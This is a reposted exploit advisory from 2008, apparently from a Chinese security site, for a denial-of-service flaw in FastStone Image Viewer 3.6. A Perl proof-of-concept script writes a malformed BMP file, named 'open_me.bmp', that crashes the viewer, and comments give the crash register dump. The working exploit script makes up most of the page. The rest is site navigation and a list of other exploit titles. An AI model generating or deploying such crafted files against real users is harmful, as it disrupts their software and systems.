FastStone Image Viewer 3.6 (malformed bmp image) DoS Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

FastStone Image Viewer 3.6 (malformed bmp image) DoS Exploit

来源：DaRk-CodeRs Group 作者：suN8Hclf 发布时间：2008-10-06

Name      : FastStone Image Viewer v3.6 (malformed bmp image) DoS Exploit
Credit    : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com
Download: : http://www.FastStone.org
Greetz    : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind,
            Katharsis, all from #dark-coders and others;]

PoC:

#!/usr/local/bin/perl
# Open file (File->Open) or simply click on the image miniature
# FastStone Image Viewer v3.6 simply crashes
# Tested on Windows 2000 SP4
#-----INFO----------------------
#EAX 00002847
#ECX 00000000
#EDX 00402818 dumped_F.00402818
#EBX 00402818 dumped_F.00402818
#ESP 00402818 dumped_F.00402818
#EBP 0012DF08
#ESI 00402818 dumped_F.00402818
#EDI 000161E8
#EIP 012F0447
#
#Reason: "Access violation when writing to [00002847]
#-----INFO----------------------

my $code="\x42\x4d\x3c\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00".
         "\x00\x00\xcc\x5f\x01\x00\xe8\x61\x01\x00\x01\x00\x18\x00\x00\x00".
         "\x00\x00\x06\x00\x00\x00\x98\x9e\x00\x00\x88\x77\x00\x00\xff\x02".
         "\xfd\x00\x00\x00\x00\x00\x41";
my $file="open_me.bmp";

open(my $FILE, ">>$file") or die "[!]Cannot open file";
print $FILE $code;
close($FILE);
print "$file has been generated\n"
print "Credit: suN8Hclf, www.dark-coders.pl"

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告